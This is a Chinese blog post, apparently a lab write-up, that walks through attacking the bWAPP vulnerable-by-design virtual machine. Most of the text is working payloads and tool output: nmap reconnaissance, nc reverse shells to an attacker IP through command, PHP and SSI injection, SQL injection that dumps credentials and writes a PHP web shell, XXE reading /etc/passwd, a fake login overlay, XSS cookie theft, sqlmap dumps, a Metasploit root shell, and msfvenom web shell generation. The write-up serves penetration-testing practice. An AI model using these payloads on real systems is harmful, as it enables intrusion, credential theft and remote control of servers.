前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >bWAPP练习

bWAPP练习

作者头像
全栈程序员站长
发布2022-11-09 20:23:25
1.1K0
发布2022-11-09 20:23:25
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

简介

虚拟机下载地址: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

如果你想自己去部署环境:https://sourceforge.net/projects/bwapp/files/bee-box/

bWAPP包含有100多个漏洞,包括OWASP Top10安全风险,很爽的PHPweb靶机。

登录username:bee password:bug 可设置漏洞级别来增加难度低->中->高。

bWAPP练习
bWAPP练习

想详细了解去查阅相关文档,让我们愉快的干掉小蜜蜂

0x001 侦查

在怎样也要侦查一下这个虚拟机吧,基本的流程,拿出Nmap扫它一下下

代码语言:javascript
复制
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           ProFTPD 1.3.1
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_  2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp   open  smtp          Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
80/tcp   open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp  open  ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp  open  netbios-ssn   Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
666/tcp  open  doom?
| fingerprint-strings: 
|   GenericLines, beast2: 
|     *** bWAPP Movie Service ***
|_    Matching movies: 0
3306/tcp open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open  vnc           VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
6001/tcp open  X11           (access denied)
8080/tcp open  http          nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open  ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg: 
|_  http/1.1
9080/tcp open  http          lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/4%Time=5C06158B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,400,"\*\*\*\x20bWAPP\x20Movie\x20Service\x20\*\*\*\nMatching\
SF:x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0")%r(beast2,400,"\*\*\*\x20bWAPP\x20Movie\x20Service
SF:\x20\*\*\*\nMatching\x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host:  bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: bee-box
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: bee-box
|_  System time: 2018-11-07T11:27:32+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

有了基本的了解,开始进行漏洞的练习

0x002 A1 注入

1.HTML Injection – Reflected (GET)

查看表单是get还是post打开浏览器 F12 查看,查看源码页面搜First name:,为了方便回放数据,使用burpsuite

代码语言:javascript
复制
<form action="/bWAPP/htmli_get.php" method="GET">

HTML <a>标签的注入 <a href=http://www.baidu.com>点此领取奖励</a>

代码语言:javascript
复制
<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #js 窃取cookie 可以展开思路去扩展,条条马路通罗马

当设置中级别的时候注入不了,尝试对代码进行转码处理 ,高级别的还无法绕过,对php不太熟悉

代码语言:javascript
复制
<a href=http://www.baidu.com>点此领取奖励</a>
#进行转码
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E

2.HTML Injection – Reflected (POST)

代码语言:javascript
复制
<a href=http://www.baidu.com>点此领取奖励</a> #low
代码语言:javascript
复制
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium

high 作弊办法只有 改数据了。。。。非常无耻啊啊啊!!!

代码语言:javascript
复制
POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #改1 或 0
Connection: close
Upgrade-Insecure-Requests: 1
firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit

3.HTML Injection – Reflected (URL)

代码语言:javascript
复制
#low 反射URL可以任意修改
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script>  HTTP/1.1
Host: 192.168.1.104 #IP地址任意修改

4.HTML Injection – Stored (Blog)

代码语言:javascript
复制
<a href=http://www.baidu.com>点此领取奖励</a> #low 可写入任意的代码进行执行
代码语言:javascript
复制
#伪造登录
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

5.iFrame Injection

代码语言:javascript
复制
#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000 
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>

6.LDAP Connection Settings

代码语言:javascript
复制
#没有配置 需要自己配置下
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #安装web页面
clear=* #注入

7.Mail Header Injection (SMTP)

代码语言:javascript
复制
test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com

8.OS Command Injection

代码语言:javascript
复制
#low
; whoami
www.nsa.gov && nc -vn  192.168.1.101 4444 -e /bin/bash  
#监听
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#medium
www.nsa.gov | nc -vn  192.168.1.101 4444 -e /bin/bash

high 的时候很难绕过上工具,那么多事 直接搞它

代码语言:javascript
复制
commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"

9.OS Command Injection – Blind

代码语言:javascript
复制
#low
127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash
#high  直接用commix

10.PHP Code Injection

代码语言:javascript
复制
#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn  192.168.1.101 4444 -e /bin/bash')
#还可以执行wget http://去下载木马 直接getshell 这种方法比瑞士军刀和反弹shell的隐藏性更好

11.Server-Side Includes (SSI) Injection

代码语言:javascript
复制
#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->
#接收
nc -nlvp 4444

12.SQL Injection (GET/Search)

代码语言:javascript
复制
#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #
iron' union select 1,login,password,email,5,6,7 from users #
#可根据得到的密码进行激活成功教程
john --format:raw-sha1 /root/password.txt --show
?:bug
1 password hash cracked, 0 left
iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #

13.SQL Injection (GET/Select)

代码语言:javascript
复制
movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go

14.SQL Injection (POST/Search)

代码语言:javascript
复制
POST 提交参数一样的道理
AJAX 简单理解输入参数立马查询,和getpost注入一样的道理,
AJAX 分同步和异步
’ ‘
1' union select 1,2,3,4,5,6,7#
1' union select 1,login,3,email,password,6,7 from users#

15.SQL Injection – Stored (XML)

代码语言:javascript
复制
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>
#burp中查看数据

SqlMap:脱库

代码语言:javascript
复制
sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs
available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql
--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database:    'bWAPP'
--current-user
[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user:    'root@localhost'
--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'
--passwords
cracked password 'bug' for user 'root' #直接停了不让它跑了
-D bWAPP --tables
[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog     |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+
-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+
-D bWAPP -T users -C password --dump
Database: bWAPP                                                                
Table: users
[2 entries]
+------------------------------------------------+
| password                                       |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+
--dump-all   #直接脱库
#本地激活成功教程密码太耗费时间了,可以放到服务器让它去跑。

0x003. A2 – Broken Auth. & Session Mgmt

1.Broken Auth. – CAPTCHA Bypassing

代码语言:javascript
复制
#使用burp Intruder 进行暴力激活成功教程
login=§test§&password=§123456§&captcha_user=zq9mso&form=submit

2.Broken Auth. – Forgotten Function

代码语言:javascript
复制
email=§12312414%40163.com§&action=forgot  #撞

3.Session Mgmt. – Administrative Portals

代码语言:javascript
复制
admin=1

4.Session Mgmt. – Cookies (Secure)

代码语言:javascript
复制
security_level=0; top_security=no<script>alert(1)</script>
Connection: close

5.Session Mgmt. – Session ID in URL

代码语言:javascript
复制
smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c

0x004. A3 – Cross-Site Scripting (XSS)

1.XSS – Reflected (GET) (POST)

代码语言:javascript
复制
<script>alert(document.cookie)</script>

2.XSS – Reflected (JSON)

代码语言:javascript
复制
<svg onload=prompt(0)>

3.XSS – Reflected (AJAX/JSON)

代码语言:javascript
复制
<img src=1 onerror=alert(1) />

4.XSS – Reflected (Back Button)

代码语言:javascript
复制
Referer: ';alert(1);'

5.XSS – Reflected (Custom Header)

代码语言:javascript
复制
bWAPP: <script>alert(1)</script>

6.XSS – Reflected (Eval)

代码语言:javascript
复制
date=alert(1)

7.XSS – Reflected (HREF)

代码语言:javascript
复制
Referer: <script>alert(1)</script>

8.XSS – Reflected (User-Agent)

代码语言:javascript
复制
User-Agent: <script>alert(1)</script>

0x005. A4 – Insecure Direct Object References

1.Insecure DOR (Change Secret)

代码语言:javascript
复制
secret=1&login=test&action=change

2.Insecure DOR (Reset Secret)

代码语言:javascript
复制
<reset><login>bee</login><secret>Any bugs?</secret></reset> #任意修改
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>

3.Insecure DOR (Order Tickets)

代码语言:javascript
复制
ticket_quantity=1&ticket_price=15&action=order #修改隐藏字段
#很多对价格没有进行模糊处理的BUG,即便是进行模糊处理,还可以复制小数进行测试

0x006. A5 – Security Misconfiguration

1.Arbitrary File Access (Samba)

代码语言:javascript
复制
msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit 
[*] Started reverse TCP double handler on 192.168.1.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...
id
uid=0(root) gid=0(root) groups=0(root)

使用enum4linux 进行枚举

代码语言:javascript
复制
#详细用法https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #可以直接后面加IP进行详细的信息收集
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec  7 17:43:26 2018
========================== 
|    Target Information    |
========================== 
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.104    |
===================================================== 
[+] Got domain/workgroup name: ITSECGAMES
====================================== 
|    Session Check on 192.168.1.104    |
====================================== 
[+] Server 192.168.1.104 allows sessions using username '', password ''
============================================ 
|    Getting domain SID for 192.168.1.104    |
============================================ 
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================== 
|    Share Enumeration on 192.168.1.104    |
========================================== 
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
opt             Disk      
tmp             Disk      oh noes!
print$          Disk      Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
Snagit_9:6      Printer   Snagit 9
Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
PDF             Printer   PDF
Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
Fax:2           Printer   Fax
CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Server               Comment
---------            -------
Workgroup            Master
---------            -------
ITSECGAMES           BEE-BOX
WORKGROUP            FREE
[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$	[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt	Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp	Mapping: OK, Listing: OK
//192.168.1.104/print$	Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7	Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6	Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8	Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF	Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1	Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2	Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3	Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec  7 17:43:27 2018

smbclient -L 192.168.1.104

代码语言:javascript
复制
Enter WORKGROUP\root's password: 
Anonymous login successful
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
opt             Disk      
tmp             Disk      oh noes!
print$          Disk      Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
Snagit_9:6      Printer   Snagit 9
Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
PDF             Printer   PDF
Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
Fax:2           Printer   Fax
CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server               Comment
---------            -------
Workgroup            Master
---------            -------
ITSECGAMES           BEE-BOX

上传文件

代码语言:javascript
复制
smbclient \\\\192.168.1.104\\tmp -c "put test"

0x007

1.HTML5 Web Storage (Secret)

代码语言:javascript
复制
if(typeof(Storage) !== "undefined")
{
localStorage.login = "bee";
localStorage.secret = "1";
alert(localStorage.login);
alert(localStorage.secret);
}

2.Directory Traversal – Directories

代码语言:javascript
复制
?directory=../../../../var/www/

3.Directory Traversal – Files

代码语言:javascript
复制
?page=../../../../../etc/passwd

4.Host Header Attack (Cache Poisoning)

代码语言:javascript
复制
GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com

5.Remote & Local File Inclusion (RFI/LFI)

代码语言:javascript
复制
?language=../../../../etc/passwd&action=go
?language=http://www.baidu.com

6.Restrict Device Access

代码语言:javascript
复制
Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7

7.XML External Entity Attacks (XXE)

代码语言:javascript
复制
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>

8.CSRF (Change Password)

代码语言:javascript
复制
?password_new=123&password_conf=123&action=change

9.PHP Eval Function

代码语言:javascript
复制
php_eval.php?eval=echo shell_exec("cat /etc/passwd");

10.Unrestricted File Upload

代码语言:javascript
复制
#low
weevely generate 123456 shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php
#high 
Remote & Local File Inclusion (RFI/LFI) 
rlfi.php?language=images/shelltmp.php.png

总结:

只对此靶机进行了黑盒测试,没对源码分析。对php这门语言没有过多的学习,还是比较懒散。运用了kali linux工具进行渗透,工具的扫描会出现误报情况和诸多漏洞扫描不出来。工具只是辅助作用,还需要进行手工重复确认,对原理知识还需进一步学习练习。

